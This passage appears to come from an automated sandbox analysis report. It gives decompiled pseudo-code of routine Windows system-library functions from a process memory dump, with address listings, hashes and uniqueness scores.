                                      			E03798ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x37bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E036E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0370B640(E03709AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                      0x03798ed6
                                      0x03798ee5
                                      0x03798eed
                                      0x03798ef0
                                      0x03798efa
                                      0x03798f03
                                      0x03798f0c
                                      0x03798f15
                                      0x03798f24
                                      0x03798f27
                                      0x03798f31
                                      0x03798f43
                                      0x03798f33
                                      0x03798f3c
                                      0x03798f3c
                                      0x03798f4e
                                      0x03798f4f
                                      0x03798f51
                                      0x03798f56
                                      0x03798f69

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5ab3e8efad4213306d8d7d3b8316aae28d854735cff1a09abebfbfd6e2625bb
                                      • Instruction ID: c4243c9522f92590f2f3949e0e3dead33692912a3b9de2fe1b1489e1ea86bcf2
                                      • Opcode Fuzzy Hash: b5ab3e8efad4213306d8d7d3b8316aae28d854735cff1a09abebfbfd6e2625bb
                                      • Instruction Fuzzy Hash: 7E111E74A00209DFDB04DFA8D445BAEF7F4FF08300F0442AAE518EB382E6349940CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CDB60, Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E036CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E036CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L036CE8B0(__ecx, _t14, 0xfff);
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                      0x036cdb64
                                      0x036cdb66
                                      0x036cdb6b
                                      0x036cdbaa
                                      0x036cdb71
                                      0x036cdb76
                                      0x036cdb7a
                                      0x036cdba3
                                      0x036cdb7c
                                      0x036cdb87
                                      0x036cdb8b
                                      0x03724fa1
                                      0x03724fb3
                                      0x03724fb8
                                      0x036cdb91
                                      0x036cdb96
                                      0x036cdb98
                                      0x036cdb98
                                      0x036cdb8b
                                      0x036cdb7a
                                      0x036cdb9d
                                      0x036cdba2

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                      • Instruction ID: 20f975ab9637448d1a5555c092073e1d69ec2cd2f5503f5ff9d0cc3e56980e63
                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                      • Instruction Fuzzy Hash: 57F0FC776216A29BD732DA5548C4F37F6B5DFD1A60F19003DF1099F344C9608C0296E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CB1E1, Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E036E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E036E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03747016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                      0x036cb1e8
                                      0x036cb1ea
                                      0x036cb1f3
                                      0x03724a17
                                      0x036cb1f9
                                      0x036cb1f9
                                      0x036cb1f9
                                      0x036cb201
                                      0x03724a21
                                      0x03724a2e
                                      0x00000000
                                      0x00000000
                                      0x03724a3b
                                      0x03724a4d
                                      0x03724a3d
                                      0x03724a46
                                      0x03724a46
                                      0x03724a55
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036cb20a
                                      0x036cb20a
                                      0x036cb20a
                                      0x036cb20a

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                      • Instruction ID: 16ce27d79ccf9cf2bf3101f7b8783f4fe86456ade1dd8e3129698812d7fdf684
                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                      • Instruction Fuzzy Hash: 3401D1322116C4DBD322D76AD949F79BFA8EF51750F0D00A5F9148B6B1D679C800C258
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0375FE87, Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E0375FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x37bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                      0x0375fe96
                                      0x0375fe9e
                                      0x0375fea1
                                      0x0375fead
                                      0x0375feb3
                                      0x0375feb9
                                      0x0375fec3
                                      0x0375fed5
                                      0x0375fec5
                                      0x0375fece
                                      0x0375fece
                                      0x0375fee0
                                      0x0375fee1
                                      0x0375fee3
                                      0x0375fee8
                                      0x0375fefb

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 29fc55f69c6b5f5e967c7469a6b1229c1fc3358c3b4152969f1422b3f7e64fa9
                                      • Instruction ID: a5d744180489af38f82703313e2c7424a5edac61a7d0f6c1cc7c7b2a510ed742
                                      • Opcode Fuzzy Hash: 29fc55f69c6b5f5e967c7469a6b1229c1fc3358c3b4152969f1422b3f7e64fa9
                                      • Instruction Fuzzy Hash: A701FF74A04208EFCB54DFA8D546A6EB7F4EF08304F144169B915EB392D675DA01CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798F6A, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 48%
                                      			E03798F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x37bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                      0x03798f6a
                                      0x03798f79
                                      0x03798f81
                                      0x03798f84
                                      0x03798f8b
                                      0x03798f91
                                      0x03798f94
                                      0x03798f9e
                                      0x03798fb0
                                      0x03798fa0
                                      0x03798fa9
                                      0x03798fa9
                                      0x03798fbb
                                      0x03798fbc
                                      0x03798fbe
                                      0x03798fc3
                                      0x03798fd6

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca7ef92c47e1f87b269b89fbbf165032cc963e9393e2d8dd3593edcb60eb821c
                                      • Instruction ID: 2e14bc8ef59704e3b483181d4c0cac51f37c7dc29ace2b174d02fe291666831e
                                      • Opcode Fuzzy Hash: ca7ef92c47e1f87b269b89fbbf165032cc963e9393e2d8dd3593edcb60eb821c
                                      • Instruction Fuzzy Hash: 1C014474A0120CEFDB00EFA8E545AAEB7F4EF08300F10405AB905EB381EB74DA00CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0378131B, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 48%
                                      			E0378131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x37bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                      0x0378131b
                                      0x0378132a
                                      0x03781330
                                      0x03781336
                                      0x0378133e
                                      0x03781341
                                      0x03781344
                                      0x0378134f
                                      0x03781361
                                      0x03781351
                                      0x0378135a
                                      0x0378135a
                                      0x0378136c
                                      0x0378136d
                                      0x0378136f
                                      0x03781374
                                      0x03781387

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c4042893af386293433524d8c7a457bba4ba60b54e3ccd794f8720a70c3ff48
                                      • Instruction ID: d236a740c33d7558ee73ea7aceacc09e42659d4cc8f1429edec0e39adb5b7918
                                      • Opcode Fuzzy Hash: 7c4042893af386293433524d8c7a457bba4ba60b54e3ccd794f8720a70c3ff48
                                      • Instruction Fuzzy Hash: 2A011975A01208EFCB04EFA9D545AAEB7F4EF08700F408069B905EB391E6749A00DB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03781608, Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E03781608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x37bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E036E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0370B640(E03709AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                      0x03781608
                                      0x03781617
                                      0x0378161d
                                      0x03781625
                                      0x03781628
                                      0x0378162b
                                      0x03781636
                                      0x03781648
                                      0x03781638
                                      0x03781641
                                      0x03781641
                                      0x03781653
                                      0x03781654
                                      0x03781656
                                      0x0378165b
                                      0x0378166e

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b56e926e82e72fd57ca9480c518dbfa01526e43c93e568a4383d04e724106765
                                      • Instruction ID: 5756dce845fd09e198bf0d2214fa72a1e6cf6c61ddcdf1a7bb905829f4500c37
                                      • Opcode Fuzzy Hash: b56e926e82e72fd57ca9480c518dbfa01526e43c93e568a4383d04e724106765
                                      • Instruction Fuzzy Hash: 9DF06D75A05348EFCB14EFE8D445EAEB7F4EF08300F4440A9A905EB391EA74DA00CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EC577, Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E036EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x36a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E037988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                      0x036ec577
                                      0x036ec57d
                                      0x036ec581
                                      0x036ec5b5
                                      0x036ec5b9
                                      0x036ec5ce
                                      0x036ec5ce
                                      0x036ec5ca
                                      0x00000000
                                      0x036ec5ca
                                      0x036ec5c4
                                      0x036ec5c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036ec5ad
                                      0x00000000
                                      0x036ec5af

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54a1b26018e74e050762bab45b53e8a4770c3d441e8c158f179264ec250b66ad
                                      • Instruction ID: efebb42e2ca082f70941ea2d47b46d7424dad60a953d86ab56e472321262ad8b
                                      • Opcode Fuzzy Hash: 54a1b26018e74e050762bab45b53e8a4770c3d441e8c158f179264ec250b66ad
                                      • Instruction Fuzzy Hash: 0AF0E2B29177909FD731C728C204F22BFE89B05670F5C84ABD4368B305C7A4DCA8C651
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0370927A, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E0370927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0370FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E037092C6(_t11, _t14);
				}
				return _t11;
			}





                                      0x03709295
                                      0x03709299
                                      0x0370929f
                                      0x037092aa
                                      0x037092ad
                                      0x037092ae
                                      0x037092af
                                      0x037092b0
                                      0x037092b4
                                      0x037092bb
                                      0x037092bb
                                      0x037092c5

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction ID: 080a494b0bcd8341d01be31f1e0bc4e9275cb926a18feb4e7cf747b3e141e08d
                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction Fuzzy Hash: 80E0ED72240600ABEB21DE1ACC84B0377A9AF82B20F044078BA001E292CAE6D80887A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798D34, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 43%
                                      			E03798D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x37bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E036E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0370B640(E03709AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                      0x03798d34
                                      0x03798d43
                                      0x03798d4b
                                      0x03798d4e
                                      0x03798d52
                                      0x03798d5c
                                      0x03798d6e
                                      0x03798d5e
                                      0x03798d67
                                      0x03798d67
                                      0x03798d79
                                      0x03798d7a
                                      0x03798d7c
                                      0x03798d81
                                      0x03798d94

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ee14003cb5edce305a58c063503877811b136626744f0875d973a291c983aca
                                      • Instruction ID: 90ba0d6e69171355c6a84fddbb303a6683ff74fa87d8fb7f47c70605e77e4433
                                      • Opcode Fuzzy Hash: 0ee14003cb5edce305a58c063503877811b136626744f0875d973a291c983aca
                                      • Instruction Fuzzy Hash: A0F03A75A04708EFDB14EFA8E545B6EB7B4EF18700F5080AAE905EB291EA74DA00CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03782073, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E03782073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0377FD22(__ecx);
				_t19 =  *0x37b849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x37b8748; // 0x0
					if(__eflags <= 0) {
						E03781C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x37b8724 & 0x00000004;
							if(( *0x37b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x37b8724; // 0x0
					return E03778DF1(__ebx, 0xc0000374, 0x37b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                      0x03782076
                                      0x03782078
                                      0x0378207d
                                      0x03782083
                                      0x037820a4
                                      0x037820aa
                                      0x037820ac
                                      0x037820b7
                                      0x037820ba
                                      0x037820bc
                                      0x037820c9
                                      0x037820c9
                                      0x037820d0
                                      0x037820d2
                                      0x00000000
                                      0x037820d2
                                      0x037820be
                                      0x037820c3
                                      0x037820c5
                                      0x037820c7
                                      0x00000000
                                      0x00000000
                                      0x037820c7
                                      0x037820bc
                                      0x037820d4
                                      0x03782085
                                      0x03782085
                                      0x037820a3
                                      0x037820a3

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8fb7ffc5eee4fe96dc1f03b23cd3ea608e7d58b9a5246a91de1c0a758d32c0c
                                      • Instruction ID: 6fd8d4811adbd279ab309078d49645fe46250144072d79a1453b2e6e76336e54
                                      • Opcode Fuzzy Hash: c8fb7ffc5eee4fe96dc1f03b23cd3ea608e7d58b9a5246a91de1c0a758d32c0c
                                      • Instruction Fuzzy Hash: 65F0A03A4552DC5BEE32FF647519BE26BA8D746125B1D5889D4902B20AD5388883CA22
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798B58, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 36%
                                      			E03798B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x37bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E036E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0370B640(E03709AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                      0x03798b67
                                      0x03798b6f
                                      0x03798b72
                                      0x03798b7d
                                      0x03798b8f
                                      0x03798b7f
                                      0x03798b88
                                      0x03798b88
                                      0x03798b9a
                                      0x03798b9b
                                      0x03798b9d
                                      0x03798ba2
                                      0x03798bb5

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 248ec3bb2c586e8eddb1afdbbd7e4714f488b8e1d0dfbcc1c1c3bfb3f02d8b1e
                                      • Instruction ID: 9c3817942da64511dc96f9e2b553e8c07760e1c69b987cd0d977574ae6caa3e0
                                      • Opcode Fuzzy Hash: 248ec3bb2c586e8eddb1afdbbd7e4714f488b8e1d0dfbcc1c1c3bfb3f02d8b1e
                                      • Instruction Fuzzy Hash: 38F082B4A04258EBDF10EBA8E906E6EB3B4EF04304F040559BA15EF3D1EB74D900C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C4F2E, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E037988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E036EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x36a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                      0x036c4f2e
                                      0x036c4f34
                                      0x036c4f38
                                      0x03720b85
                                      0x03720b85
                                      0x03720b89
                                      0x03720b9a
                                      0x03720b9a
                                      0x03720b9f
                                      0x00000000
                                      0x03720b9f
                                      0x03720b94
                                      0x03720b98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03720b98
                                      0x036c4f3e
                                      0x036c4f48
                                      0x00000000
                                      0x036c4f6e
                                      0x00000000
                                      0x036c4f70

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a1bc9585fcf99bf929b5ce1fd5e8226f7207db85247011533e708fb02558e2a
                                      • Instruction ID: f768b22da0f77f9178ccfdc7c3ef8e8dc987e8cc954eacc538e78eb9cd1d3e7b
                                      • Opcode Fuzzy Hash: 4a1bc9585fcf99bf929b5ce1fd5e8226f7207db85247011533e708fb02558e2a
                                      • Instruction Fuzzy Hash: 3BF0E2365267A89FD771C718C944F22BBD9EB0177CF0844A9E4058B920CB24EC44CEA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036E746D, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E036E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
